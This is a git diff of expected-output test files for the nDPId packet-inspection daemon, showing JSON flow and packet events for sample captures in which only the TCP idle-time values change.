+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490904169152,"flow_last_seen":1490904170195,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":2085,"flow_avg_l4_payload_len":69,"midstream":1,"thread_ts_msec":1490904170243,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.1.1","src_port":44206,"dst_port":5672,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AMQP","breed":"Acceptable","category":"RPC"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":160,"source":"amqp.pcap","alias":"nDPId-test","packets-captured":160,"packets-processed":160,"total-skipped-flows":0,"total-l4-data-len":12954,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1490904170243} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 160/160 
diff --git a/test/results/android.pcap.out b/test/results/android.pcap.out index 3931cbf0f..0f342fa06 100644 --- a/test/results/android.pcap.out +++ b/test/results/android.pcap.out 
@@ -1,23 +1,23 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"android.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1582454769772} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} 
-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} -00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} -00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454769772,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1582454769772,"pkt":"xGGLNYKpxiwDYGpkCABFAABMMy4AADUGGCtfZRg1wKgCEQG7xfVNnd4qbhnKg4AYAUXNDgAAAQEICmx+XigR4ZkoFwMDABMwxZA0Xbk6ucnG2OFNZYAG8R1y"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454779631,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454779631,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBirQcAAC4GWpAR+LBLwKgCEQG7xZj0WotEsqX09IAYBCokkgAAAQEIClsVyooR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8Hg=="} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1582454779631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454779631,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTrQgAAC4GWp4R+LBLwKgCEQG7xZj0WotysqX09IAZBCpyhAAAAQEIClsVyooR3+x3FQMDABoAAAAAAAAABZSZBhugqn7IvMs7ScmDJ6yQxA=="} +00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1582454779931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454779931,"pkt":"xGGLNYKpxiwDYGpkCABFAACBrQkAAC4GWnER+LBLwKgCEQG7xZj0WotEsqX09IAZBCq7DgAAAQEIClsVy7YR3+x3FwMDACkAAAAAAAAABGgk1MfD1SR1H5v5Q6dSq6XAgQAjDJnQ9jro2uiXnku8HhUDAwAaAAAAAAAAAAWUmQYboKp+yLzLO0nJgyeskMQ="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} 
+00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} 
